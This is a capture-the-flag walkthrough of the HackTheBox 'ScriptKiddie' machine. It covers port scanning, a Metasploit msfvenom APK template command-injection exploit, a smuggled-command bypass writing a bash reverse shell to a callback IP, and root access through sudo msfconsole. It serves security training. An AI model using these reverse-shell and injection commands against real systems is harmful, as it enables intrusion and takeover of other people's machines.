HackTheBox: (“ScriptKiddie”) — Walkthrough
Hi People :D
Today we gonna solve the “ScriptKiddie” machine from HackTheBox, let’s go :D
TL;DR
— — —
- Ports 5000 and 22 are opened.
- Navigate to the website on port 5000, it contains three functions one of them is payloads creation with msfvenom.
- We can upload template file in payloads creation function, I found a Metasploit module which exploits a command injection vulnerability in this function.
- Using this module, I created the exploit APK then upload it which gave me a kid user shell and I found the user flag in the kid user directory.
- In the /home/pwn directory, there’s a bash script called scanlosers.sh which contains some code to read another file called hackers and do some filters that we need to bypass to get a shell as a pwn user
- After reading the script, I knew the right bypass that I used to execute a bash reverse shell in the hackers file and I successfully got a pwn user shell
- From the pwn user shell, we can run msfconsole as root without password, we can use msfconsole to read the root flag from /root/root.txt file
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.226
We have two open ports (22/5000) so let’s navigate to the website on port 5000
Web Enumeration
— — — — — — — —
We have a website with some functions ( port scan with Nmap & make payloads with msfvenom & searchsploit ) on port 5000
I tried to brute-force directories and I also tried to trigger command injection in the Nmap function and the searchsploit function but without success ☹.
The remaining function is the payloads creation function with msfvenom, the interesting thing about this function is that we can upload a template file.
At the time, I didn’t know what template file was so I searched for any available exploit, fortunately, there’s a Metasploit module to trigger RCE in this function
Exploitation
— — — — — —
Let’s try this module, first, we use the module then set LHOST to your HTB VPN IP (tun0) and execute exploit
command to make the exploit APK, here is the commands:
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injectionset LHOST tun0set LPORT 4444exploit
We successfully made an exploit APK to get a shell, now we only need to start a Netcat listener then upload our crafted APK.
User Flag
— — — — —
Choose android os and put any lhost (like: 10.10.10.10) then choose your APK file (msf.apk by default) and click on generate button, you’ll get a shell as kid user and you will find the user flag in /home/kid/user.txt file ☺.
Root Flag
— — — — —
We can’t execute sudo -l
command so let’s do some file enumeration.
Move to /home/pwn directory, there’s a bash script called scanlosers.sh.
This script reads another file called hackers then does cut
command with -d
argument that takes a delimiter and -f
argument that takes a field number then does do-while
loop with Nmap command and redirect the output to /dev/null to clear it.
So we need to bypass these filters, first, we need to bypass the cut command by add two spaces followed by a semicolon then put our reverse shell command followed by # to prevent redirection to /dev/null.
The final command will be like that:
;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #
Start a Netcat listener and put this command in the hackers file with the echo command:
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #" >> hackers
And we successfully get a pwn user shell ☺.
Now try sudo -l
command again with pwn user, we can run msfconsole as root without password
We can use msfconsole as a normal bash shell, this means that we can read the root flag from /root/root.txt by using normal cat
command in msfconsole because we are running msfconsole as root and we have access to the root directory
Thanks for reading and I hope you love this writeup ❤.
You can give me a Respect on my HackTheBox Account (if you want :D).